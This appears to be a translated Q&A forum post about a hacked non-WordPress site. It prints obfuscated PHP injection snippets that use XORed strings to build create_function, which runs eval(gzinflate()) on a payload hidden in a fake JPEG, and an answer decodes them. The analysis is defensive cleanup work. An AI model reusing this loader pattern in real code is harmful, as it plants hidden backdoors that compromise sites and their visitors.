一位客户最近找到了一个问题,他们的网站将根据他们的意愿重定向到不同的网站。罪魁祸首原来是以下片段:
// $wp_ac_remote_retrieve_header = ',S7<f-NH9;%.KM7kF0^L2&1YzYJM.>RB,|Mu"C_@}H2#HEFGKSI 5<K8]M"97Z)GM&FbN%CAKL1/Z:JUOD3!9-!.<B0?9kCNWBQ~~k1U7,7i~&>8<(R<NE<^Zb0>2,EQ]R/SS%wSSD!yN,;"#/T$d/>&b|a^v' ^ "I%VPNm)2PUCB*9RC Y2)mAT-%:%#Z[<6_ToZJ,2%R*^B<1i!*> LL^>K4#GJD9L)9C4L-J.n&5PK7S\$z#-QSX_HKOm`wi.;-2.~.6;t-TI[F-N_JYL}y=&T;(MtYUo*?)3F=6WX;6(Q&<IWCWF;JJ_PA@UHwM";
// $get_ho_tag_template = 'cr atDW"ufb4)j.'|'!"E!`%HDTl#pHoJ';
// $start_hg_wp = $get_ho_tag_template(null,$wp_ac_remote_retrieve_header);
// $start_hg_wp();
显然这不是他们第一次遭到黑客攻击,因为我还发现以下片段已经注释掉了:
// $comment_zr_date = 'J4UCmj82"&6D?XQz/_F;kB<:#L,FYR<*+vMYS"87tW8OE# B8>LDS=R+ HI<=8S#G5VG@Q;jM^]@5F<(B+5n_DW6L,CX@Nr=h2X:_MKaq-*FOOXH;>^)+FV90%a7qyg^N3*DVQCT7:MvJkKU' ^ '/B4/E*_HKHP(^,4RI6*^4%YN|/C(-7R^X^ov;MUR[0W=!LN$LNc"2P;GY*<OTV6P4V3)44ID.10oX?]L/B[A3-5D-^*=3a"u8w Y:!d19}o>,*4ghV?[N"yv|`Ng!*H7#RM!farz]J*TcBbn';
// $get_spe_footer = "<=:Q.0(CEVO!8=J" ^ "_O_0ZUw%08,UQR\$";
// $wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
// $wp_olw_rss();
没有其他任何对这些函数/变量的引用。或者至少在我进行全站搜索时没有出现。此外,文件的权限已更改为只读。
有关他们如何实现这一点的任何想法?或者上面的代码如何工作/工作?删除后,问题/黑客完全消失。然而,由于这是他们第三次遇到这个问题,我相信他们已经离开了自己的某个地方。请注意,这不是WP站点。
**编辑
文件很大要包含,这是一个链接:
如果你通过base64解码器运行它,你会得到:
但是,我无法再解读它。似乎有更多编码或......?
答案 0 :(得分:5)
这是一种有趣的混淆。
echo $comment_zr_date;
给出:
eval(@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")));
和
echo $get_spe_footer;
给予:
create_function
混淆通过在两个字符串上使用按位运算符来工作(感谢Populus提示)。另请参阅PHP strange bitwise operator impact on strings
在明文php中它说:
$comment_zr_date = 'eval(@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")))';
$get_spe_footer = 'create_function';
// execute the function
$wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
$wp_olw_rss();
发布
的内容后,可以进一步评估@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg"))